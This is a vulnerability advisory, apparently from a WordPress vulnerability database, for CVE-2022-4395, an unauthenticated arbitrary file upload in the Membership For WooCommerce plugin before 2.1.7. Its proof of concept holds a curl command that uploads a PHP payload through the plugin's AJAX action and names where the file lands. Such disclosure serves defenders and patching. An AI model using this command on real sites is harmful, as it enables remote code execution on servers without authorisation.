Membership For WooCommerce < 2.1.7 – Unauthenticated Arbitrary File Upload | CVE 2022-4395 | Plugin Vulnerabilities

Description

The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.

Proof of Concept

1. Install and activate WooCommerce (dependency, no setup required) 

2. Create a local file containing the payload on /tmp/payload.php 

3. Execute the following curl command:
 
curl -i 'https://example.com/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload' -F 'file=@/tmp/payload.php;type=text/csv'
 
4. The uploaded file will be available at wp-content/uploads/mfw-activity-logger/csv-uploads .

Affects Plugins

membership-for-woocommerce

Fixed in 2.1.7

References

CVE

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

80407ac4-8ce3-4df7-9c41-007b69045c40

Timeline

Publicly Published

2023-01-04 (about 1 years ago)

Added

2023-01-04 (about 1 years ago)

Last Updated

2023-01-04 (about 1 years ago)

Other

Published

Title

Published

2014-08-01

Title

dagda - Custom Background Shell Upload

Published

2023-09-07

Title

My Account Page Editor < 1.3.2 - Subscriber+ Arbitrary File Upload

Published

2014-08-01

Title

Radial - Remote File Upload

Published

2024-04-19

Title

Royal Elementor Addons and Templates < 1.3.95 - Unauthenticated Limited File Upload

Published

2014-08-01

Title

Lazy SEO 1.1.9 - lazyseo.php File Upload Arbitrary Code Execution